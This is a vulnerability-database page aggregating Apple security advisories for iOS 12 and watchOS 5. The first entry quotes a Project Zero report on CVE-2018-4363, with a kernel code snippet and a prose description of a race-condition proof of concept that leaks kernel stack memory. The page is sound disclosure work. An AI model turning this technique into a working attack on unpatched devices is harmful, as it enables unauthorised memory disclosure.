VARIoT IoT vulnerabilities database
| VAR-201904-1477 | CVE-2018-4363 | plural Apple Product input validation vulnerability |
CVSS V2: 7.1 CVSS V3: 5.5 Severity: MEDIUM |
An input validation issue existed in the kernel. This issue was addressed with improved input validation. This issue affected versions prior to iOS 12, tvOS 12, watchOS 5. Both Apple iOS and tvOS are products of Apple Inc. in the United States. Apple iOS is an operating system developed for mobile devices. Kernel is one of the kernel components. tvOS is a smart TV operating system. An attacker can exploit this vulnerability to read restricted memory. iOS kernel stack memory disclosure due to failure to check copyin return value
CVE-2018-4363
Here's a code snippet from sleh.c with the second level exception handler for undefined instruction exceptions:
static void
handle_uncategorized(arm_saved_state_t *state, boolean_t instrLen2)
{
exception_type_t exception = EXC_BAD_INSTRUCTION;
mach_exception_data_type_t codes[2] = {EXC_ARM_UNDEFINED};
mach_msg_type_number_t numcodes = 2;
uint32_t instr; <------ (a)
if (instrLen2) {
uint16_t instr16;
COPYIN(get_saved_state_pc(state), (char *)&instr16, sizeof(instr16));
instr = instr16;
} else {
COPYIN(get_saved_state_pc(state), (char *)&instr, sizeof(instr)); <------- (b)
}
....
else {
codes[1] = instr; <------ (c)
}
}
exception_triage(exception, codes, numcodes); <-------- (d)
At (a) the uint32_t instr is declared uninitialized on the stack.
At (b) the code tries to copyin the bytes of the exception-causing instruction from userspace
note that the COPYIN macro doesn't itself check the return value of copyin, it just calls it.
At (c) instr is assigned to codes[1], which at (d) is passed to exception_triage.
that codes array will eventually end up being sent in an exception mach message.
The bug is that we can force copyin to fail by unmapping the page containing the undefined instruction
while it's being handled. (I tried to do this with XO memory but the kernel seems to be able to copyin that just fine.)
This PoC has an undefined instruction (0xdeadbeef) on its own page and spins up a thread to keep
switching the protection of that page between VM_PROT_NONE and VM_PROT_READ|VM_PROT_EXECUTE.
We then keep spinning up threads which try to execute that undefined instruction.
If the race windows align the thread executes the undefined instruction but when the sleh code tries to copyin
the page is unmapped, the copying fails and the exception message we get has stale stack memory.
This PoC just demonstrates that you do get values which aren't 0xdeadbeef in there for the EXC_ARM_UNDEFINED type.
You'd have to do a bit more fiddling to work out how to get something specific there.
Note that there are lots of other unchecked COPYIN's in sleh.c (eg when userspace tries to access a system register not allowed
for EL0) and these seem to have the same issue.
tested on iPod Touch 6g running 11.3.1, but looking at the kernelcache it seems to still be there in iOS 12.
Found by: ianbeer
.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-4329: Hugo S.
CVE-2018-4338: Lee @ SECLAB, Yonsei University working with Trend
Micro's Zero Day Initiative
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, and Zach Malone of CA Technologies for their assistance. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-10 Additional information for
APPLE-SA-2018-9-24-5 watchOS 5
watchOS 5 addresses the following:
CFNetwork
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Available for: Apple Watch Series 1 and later
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Available for: Apple Watch Series 1 and later
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreText
Available for: Apple Watch Series 1 and later
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4347: an anonymous researcher
Entry added October 30, 2018
Grand Central Dispatch
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
IOHIDFamily
Available for: Apple Watch Series 1 and later
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: Apple Watch Series 1 and later
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4383: Apple
Entry added October 30, 2018
IOUserEthernet
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4401: Apple
Entry added October 30, 2018
iTunes Store
Available for: Apple Watch Series 1 and later
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: Apple Watch Series 1 and later
Impact: A malicious application may be able to leak sensitive user
information
Description: An access issue existed with privileged API calls.
CVE-2018-4399: Fabiano Anemone (@anoane)
Entry added October 30, 2018
Kernel
Available for: Apple Watch Series 1 and later
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4337: Ian Beer of Google Project Zero
CVE-2018-4340: Mohamed Ghannam (@_simo36)
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
CVE-2018-4425: cc working with Trend Micro's Zero Day Initiative,
Juwei Lin (@panicaII) of Trend Micro working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Kernel
Available for: Apple Watch Series 1 and later
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: Apple Watch Series 1 and later
Impact: An attacker in a privileged network position may be able to
execute arbitrary code
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4407: Kevin Backhouse of Semmle Ltd.
Entry added October 30, 2018
Safari
Available for: Apple Watch Series 1 and later
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert
Ulu of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi -
Ankara/TA1/4rkiye, Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l
University, Metin Altug Karakaya of Kaliptus Medical Organization,
Vinodh Swami of Western Governor's University (WGU)
Security
Available for: Apple Watch Series 1 and later
Impact: A local user may be able to cause a denial of service
Description: This issue was addressed with improved checks.
CVE-2018-4395: Patrick Wardle of Digita Security
Entry added October 30, 2018
Security
Available for: Apple Watch Series 1 and later
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Symptom Framework
Available for: Apple Watch Series 1 and later
Impact: An application may be able to read restricted memory
Description: An out-of-bounds read was addressed with improved bounds
checking.
CVE-2018-4203: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
Text
Available for: Apple Watch Series 1 and later
Impact: Processing a maliciously crafted text file may lead to a
denial of service
Description: A denial of service issue was addressed with improved
validation.
CVE-2018-4304: jianan.huang (@Sevck)
Entry added October 30, 2018
WebKit
Available for: Apple Watch Series 1 and later
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
WebKit
Available for: Apple Watch Series 1 and later
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
WebKit
Available for: Apple Watch Series 1 and later
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
WebKit
Available for: Apple Watch Series 1 and later
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
CVE-2018-4319: John Pettitt of Google
WebKit
Available for: Apple Watch Series 1 and later
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by OSS-Fuzz
Additional recognition
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Kernel
We would like to acknowledge Brandon Azad for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
WebKit
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Installation note:
Instructions on how to update your Apple Watch software are
available at https://support.apple.com/kb/HT204641
To check the version on your Apple Watch, open the Apple Watch app
on your iPhone and select "My Watch > General > About".
Alternatively, on your watch, select "My Watch > General > About".
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQJdBAEBCABHFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlvYkgUpHHByb2R1Y3Qt
c2VjdXJpdHktbm9yZXBseUBsaXN0cy5hcHBsZS5jb20ACgkQeC9tht7TK3GbihAA
rJrGRlOECVnj/z6kzobQ6SjqeXQanrEJKOEbP12pOEgOcqhJd/CsRIGMGxtG8cRC
H60/qGsVtDXhqmGZQl2cBaMeg+bagLvSaRUC6urXqYLIKoGay7zsbQyWS4hAbyNu
Gpu0k5bvb2tr3IZIfqHfUcScxpsB3zJiYejtgLow2MDbkt84qNqx73xYbOIXDJoc
kfyNhb/RKqiXOi5Yvh+E84GARjUSGUFD5fMbIMu7Lf0cwGpL3XakKG8S+8L0W3/W
vGsl7V8DWeH6qbVoMkLUxWGxWzCd4bUr88J0cybski3L4SvpYbDPMMKxQkyn4Rfq
qSDG3RMS0MUeoGn/iwRcJ8p6gPMGjWTT+lvX0XaZzG3b/mkOw8C2jRs1Ds8vUbRB
Pxn1AQvg0x+EW/HIKqrvbE6i5pLjhurHYChy9tI9AS2iSHsAnrSB8DV8mc4T4v6a
zJqJO5qPPCVJ9K328l+FyXe+X5erQP4/dwol71VjweA/peSJCL34/YL3oSs9e41R
ApabYVIphnq0Ion5gVNancPhgQEbkIjMncFiGRg4wF0jly2Ni+NsnDquTKEM3VvG
mOlo0VVw3XxLhtiQF/RKbQSy+6dK0YGykIsmnz/DsstxS4xRiWbk75XErA/nSwPs
fHAicxI2AmpI+PbdYcPI4D3eJr/1ZDH8NvY1897WX5c=
=fz+z
-----END PGP SIGNATURE-----
| VAR-201904-1425 | CVE-2018-4335 | iOS Input validation vulnerability |
CVSS V2: 4.3 CVSS V3: 5.5 Severity: MEDIUM |
A validation issue was addressed with improved input sanitization. This issue affected versions prior to iOS 12. Apple iOS is prone to multiple security vulnerabilities.
Attackers can exploit these issues to gain sensitive information, bypass security mechanisms, and conduct spoofing attacks and perform unauthorized actions. IOMobileFrameBuffer is one of the connection frames used for screenshots. An attacker could exploit this vulnerability to read restricted memory. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-9-24-4 Additional information for
APPLE-SA-2018-9-17-1 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Auto Unlock
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Entry added September 24, 2018
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4356: an anonymous researcher
Crash Reporter
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4333: Brandon Azad
Entry added September 24, 2018
IOMobileFrameBuffer
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4335: Brandon Azad
iTunes Store
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker in a privileged network position may be able to
spoof password prompts in the iTunes Store
Description: An input validation issue was addressed with improved
input validation.
CVE-2018-4305: Jerry Decime
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: An input validation issue existed in the kernel.
CVE-2018-4363: Ian Beer of Google Project Zero
Kernel
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
kernel privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4336: Brandon Azad
CVE-2018-4344: The UK's National Cyber Security Centre (NCSC)
Entry added September 24, 2018
Messages
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted
messages
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu
of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye,
Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug
Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western
Governor's University (WGU)
Notes
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover a user's deleted notes
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4352: an anonymous researcher
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local user may be able to discover websites a user has
visited
Description: A consistency issue existed in the handling of
application snapshots.
CVE-2018-4313: 11 anonymous researchers, David Scott, Enes Mert Ulu
of Abdullah MA1/4rAide AzA1/4nenek Anadolu Lisesi - Ankara/TA1/4rkiye,
Mehmet Ferit DaAtan of Van YA1/4zA1/4ncA1/4 YA+-l University, Metin Altug
Karakaya of Kaliptus Medical Organization, Vinodh Swami of Western
Governor's University (WGU)
Safari
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A user may be unable to delete browsing history items
Description: Clearing a history item may not clear visits with
redirect chains.
CVE-2018-4329: Hugo S. Diaz (coldpointblue)
SafariViewController
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Visiting a malicious website may lead to address bar spoofing
Description: An inconsistent user interface issue was addressed with
improved state management.
CVE-2018-4362: Jun Kokatsu (@shhnjk)
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to exfiltrate autofilled data
in Safari
Description: A logic issue was addressed with improved state
management.
CVE-2018-4307: Rafay Baloch of Pakistan Telecommunications Authority
Security
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An attacker may be able to exploit weaknesses in the RC4
cryptographic algorithm
Description: This issue was addressed by removing RC4.
CVE-2016-1777: Pepi Zawodsky
Status Bar
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A person with physical access to an iOS device may be able to
determine the last used app from the lock screen
Description: A logic issue was addressed with improved restrictions.
CVE-2018-4325: Brian Adeloye
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A memory corruption issue was addressed with improved
state management.
CVE-2018-4316: crixer, Hanming Zhang (@4shitak4) of Qihoo 360 Vulcan
Team
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: Multiple memory corruption issues were addressed with
improved memory handling.
CVE-2018-4299: Samuel GroI2 (saelo) working with Trend Micro's Zero
Day Initiative
CVE-2018-4323: Ivan Fratric of Google Project Zero
CVE-2018-4328: Ivan Fratric of Google Project Zero
CVE-2018-4358: @phoenhex team (@bkth_ @5aelo @_niklasb) working with
Trend Micro's Zero Day Initiative
CVE-2018-4359: Samuel GroA (@5aelo)
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may cause unexepected cross-origin
behavior
Description: A cross-origin issue existed with "iframe" elements.
CVE-2018-4319: John Pettitt of Google
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing maliciously crafted web content may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4197: Ivan Fratric of Google Project Zero
CVE-2018-4306: Ivan Fratric of Google Project Zero
CVE-2018-4312: Ivan Fratric of Google Project Zero
CVE-2018-4314: Ivan Fratric of Google Project Zero
CVE-2018-4315: Ivan Fratric of Google Project Zero
CVE-2018-4317: Ivan Fratric of Google Project Zero
CVE-2018-4318: Ivan Fratric of Google Project Zero
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may exfiltrate image data cross-origin
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4345: an anonymous researcher
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory corruption issue was addressed with improved
validation.
CVE-2018-4191: found by OSS-Fuzz
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Cross-origin SecurityErrors includes the accessed frame's
origin
Description: The issue was addressed by removing origin information.
CVE-2018-4311: Erling Alf Ellingsen (@steike)
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious website may be able to execute scripts in the
context of another website
Description: A cross-site scripting issue existed in Safari.
CVE-2018-4309: an anonymous researcher working with Trend Micro's
Zero Day Initiative
Entry added September 24, 2018
WebKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Unexpected interaction causes an ASSERT failure
Description: A memory consumption issue was addressed with improved
memory handling.
CVE-2018-4361: found by Google OSS-Fuzz
Entry added September 24, 2018
Wi-Fi
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4338: Lee @ SECLAB, Yonsei University working with Trend
Micro's Zero Day Initiative
Additional recognition
Assets
We would like to acknowledge Brandon Azad for their assistance.
configd
We would like to acknowledge Sabri Haddouche (@pwnsdx) of Wire Swiss
GmbH for their assistance.
Core Data
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Exchange ActiveSync
We would like to acknowledge Jesse Thompson of University of
Wisconsin-Madison for their assistance.
Feedback Assistant
We would like to acknowledge Marco Grassi (@marcograss) of KeenLab
(@keen_lab) Tencent working with Trend Micro's Zero Day Initiative
for their assistance.
Mail
We would like to acknowledge Alessandro Avagliano of Rocket
Internet SE, Gunnar Diepenbruck, and Zbyszek A>>A3Akiewski for their
assistance.
MediaRemote
We would like to acknowledge Brandon Azad for their assistance.
Safari
We would like to acknowledge Marcel Manz of SIMM-Comm GmbH and Vlad
Galbin for their assistance.
Sandbox Profiles
We would like to acknowledge Tencent Keen Security Lab working with
Trend Micro's Zero Day Initiative for their assistance.
Security
We would like to acknowledge Christoph Sinai, Daniel Dudek
(@dannysapples) of The Irish Times and Filip KlubiAka (@lemoncloak)
of ADAPT Centre, Dublin Institute of Technology, Istvan Csanady of
Shapr3D, Omar Barkawi of ITG Software, Inc., Phil Caleno, Wilson
Ding, and an anonymous researcher for their assistance.
SQLite
We would like to acknowledge Andreas Kurtz (@aykay) of NESO Security
Labs GmbH for their assistance.
Status Bar
We would like to acknowledge Ju Zhu of Meituan and Moony Li and
Lilang Wu of Trend Micro for their assistance.
WebKit
We would like to acknowledge Cary Hartline, Hanming Zhang from 360
Vuclan team, Tencent Keen Security Lab working with Trend Micro's
Zero Day Initiative, and Zach Malone of CA Technologies for their
assistance.
Installation note:
This update is available through iTunes and Software Update on your
iOS device, and will not appear in your computer's Software Update
application, or in the Apple Downloads site. Make sure you have an
Internet connection and have installed the latest version of iTunes
from https://www.apple.com/itunes/
iTunes and Software Update on the device will automatically check
Apple's update server on its weekly schedule. When an update is
detected, it is downloaded and the option to be installed is
presented to the user when the iOS device is docked. We recommend
applying the update immediately if possible. Selecting Don't Install
will present the option the next time you connect your iOS device.
The automatic update process may take up to a week depending on the
day that iTunes or the device checks for updates. You may manually
obtain the update via the Check for Updates button within iTunes, or
the Software Update on your device.
To check that the iPhone, iPod touch, or iPad has been updated:
* Navigate to Settings
* Select General
* Select About.
Information will also be posted to the Apple Security Updates
web site: https://support.apple.com/kb/HT201222
This message is signed with Apple's Product Security PGP key,
and details are available at:
https://www.apple.com/support/security/pgp/
-----BEGIN PGP SIGNATURE-----
iQIzBAEBCAAdFiEEDNXJVNCJJEAVmJdZeC9tht7TK3EFAlupFUMACgkQeC9tht7T
K3Gpbg/9HBJDw9agGt5ZwLBzc5njAETI5Hxk0LDn5PjvmXpxD0kB/GcuH5vODNfi
TOUNox5KfIIaD0HB1qo5zq4zdh1VmnCNKALJK0wY0U3KaACRghu0xTjpbXsYcYQy
4aGdt+UuiPBqsMkSUrakba1JHcYWrpc4GfUaxIUZw+aFdA0G2oUOYAN5w3a3I01A
aVY1Qzq93MdUCjdr3ASXn4gdMtZeYAze4dXCkmvOXS8CPG4xok2C/MdwaTRKh1ex
S74YkM+Oz+mAG+3uebwexeHWLUbFHKBr4KXu2DFvpJ4JxNu57SOqwEDDfauVOCHb
13YFf+i+Zh5g9SODQJFXDXk6Cl6MlTuEsLcr1YX8xqmSLilaFJTiz7nxxAG0Qctb
Z80wHbzQeGaGQwEy1A99X7X33PupzyaJFiK/4F8O5neo18LliunU01Tzk16sgYFt
4Jg/e5+EkcGf1TJiCTMzIPDVsMBDRcTV9KMBUjr+LmbBJ5T8XKdg5nuEURKT3QFQ
h05+La/AFn+sJ8FFTK0WQmvM96vKQELyBBC9Npa7n1riCPHldPt9+vQ3wVwo5MD4
SdGfACevV+Qf8G1A064fM74nrJOnoqLowQiCtMSOpMx3PWwX0Pzw2SVyaFG3cLAv
221+OCYYcniG7UPdjoFv7kObGFEUC9vt1TS76VfolzKWd/fcakg=
=JOUe
-----END PGP SIGNATURE-----
| VAR-201904-1416 | CVE-2018-4325 | iOS Logic vulnerability |
CVSS V2: 2.1 CVSS V3: 2.4 Severity: LOW |
A logic issue was addressed with improved restrictions. This issue affected versions prior to iOS 12. iOS Contains a flaw in the logic due to flaws in handling restrictions.Information may be obtained. Apple iOS is prone to multiple security vulnerabilities.
Attackers can exploit these issues to gain sensitive information, bypass security mechanisms, and conduct spoofing attacks and perform unauthorized actions. Status Bar is one of the status bar components. An attacker in physical proximity could exploit this vulnerability to determine the last application used from the lock screen. -----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
APPLE-SA-2018-10-30-8 Additional information for
APPLE-SA-2018-9-24-4 iOS 12
iOS 12 addresses the following:
Accounts
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A local app may be able to read a persistent account
identifier
Description: This issue was addressed with improved entitlements.
CVE-2018-4322: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Auto Unlock
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to access local users
AppleIDs
Description: A validation issue existed in the entitlement
verification.
CVE-2018-4321: Min (Spark) Zheng, Xiaolong Bai of Alibaba Inc.
Bluetooth
Available for: iPhone SE, iPhone 6s, iPhone 6s Plus, iPhone 7,
iPhone 7 Plus, iPad Mini 4, 12.9-inch iPad Pro 1st generation,
12.9-inch iPad Pro 2nd generation, 10.5-inch iPad Pro,
9.7-inch iPad Pro, iPad 5th generation, and iPod Touch 6th generation
Impact: An attacker in a privileged network position may be able to
intercept Bluetooth traffic
Description: An input validation issue existed in Bluetooth.
CVE-2018-5383: Lior Neumann and Eli Biham
CFNetwork
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4126: Bruno Keith (@bkth_) working with Trend Micro's Zero
Day Initiative
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to elevate privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4412: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreFoundation
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to gain elevated privileges
Description: A memory corruption issue was addressed with improved
input validation.
CVE-2018-4414: The UK's National Cyber Security Centre (NCSC)
Entry added October 30, 2018
CoreMedia
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An app may be able to learn information about the current
camera view before being granted camera access
Description: A permissions issue existed.
CVE-2018-4356: an anonymous researcher
CoreText
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Processing a maliciously crafted text file may lead to
arbitrary code execution
Description: A use after free issue was addressed with improved
memory management.
CVE-2018-4347: an anonymous researcher
Entry added October 30, 2018
Crash Reporter
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to read restricted memory
Description: A validation issue was addressed with improved input
sanitization.
CVE-2018-4333: Brandon Azad
Grand Central Dispatch
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4426: Brandon Azad
Entry added October 30, 2018
Heimdal
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: An application may be able to execute arbitrary code with
system privileges
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4331: Brandon Azad
CVE-2018-4332: Brandon Azad
CVE-2018-4343: Brandon Azad
Entry added October 30, 2018
iBooks
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: Parsing a maliciously crafted iBooks file may lead to
disclosure of user information
Description: A configuration issue was addressed with additional
restrictions.
CVE-2018-4355: evi1m0 of bilibili security team
Entry added October 30, 2018
IOHIDFamily
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to execute arbitrary code
with kernel privileges
Description: A memory corruption issue was addressed with improved
input validation
CVE-2018-4408: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
Impact: A malicious application may be able to break out of its
sandbox
Description: A memory corruption issue was addressed with improved
memory handling.
CVE-2018-4341: Ian Beer of Google Project Zero
CVE-2018-4354: Ian Beer of Google Project Zero
Entry added October 30, 2018
IOKit
Available for: iPhone 5s and later, iPad Air and later, and iPod
touch 6th generation
